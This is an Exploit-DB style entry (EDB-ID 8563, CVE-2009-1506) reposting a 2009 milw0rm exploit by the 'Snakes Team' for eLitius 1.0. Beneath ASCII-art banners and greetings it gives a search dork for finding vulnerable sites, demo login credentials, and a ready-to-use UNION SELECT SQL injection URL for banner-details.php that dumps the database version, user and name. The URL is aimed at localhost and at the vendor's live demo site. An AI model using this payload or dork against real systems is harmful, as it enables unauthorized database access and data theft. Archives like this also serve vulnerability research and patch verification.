Exploit eLitius 1.0 - 'banner-details.php?id' SQL Injection

[Exploiter]

EDB-ID

8563

Проверка EDB

1. Пройдено

Автор

SNAKESPC

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2009-1506

Дата публикации

2009-04-29

==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=                                   Script: elitius SQL Injection Vulnerability                                  +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =      =                 :::::Mail: snakespc@gmail.com:::::::              =         =
                =                                                                                    =
                =                   script Demo:http://www.elitius.com/demo.html                     =
                =                                                                                    =
                =                               banner-details.php                                   =              
                 =================================== Snakespc ======================================    

Dork: Powered by eLitius Version 1.0

Note:
You must Sign in as member
username::demo>>>>>password::demo

Exploit:

http://localhost/clipshare/banner-details.php?id=-32'+UNION SELECT 1,2,3,concat(@@version,0x3a,user(),0x3a,database()),5,6,7,CHAR(83, 110, 97, 107, 101, 115, 84, 101, 97, 77)/* 

Demo :

http://www.elitius.com/demo/banner-details.php?id=-32'+UNION SELECT 1,2,3,concat(@@version,0x3a,user(),0x3a,database()),5,6,7,CHAR(83, 110, 97, 107, 101, 115, 84, 101, 97, 77)/*
                                                                      
===================================================================================================================
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::
aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::Th3 g0bL!N::: Dr-HTmL

ALL www.Snakespc.com/sc >>>> Members 
str0ke.....>>>>.....milw0rm
===================================================================================================================

# milw0rm.com [2009-04-29]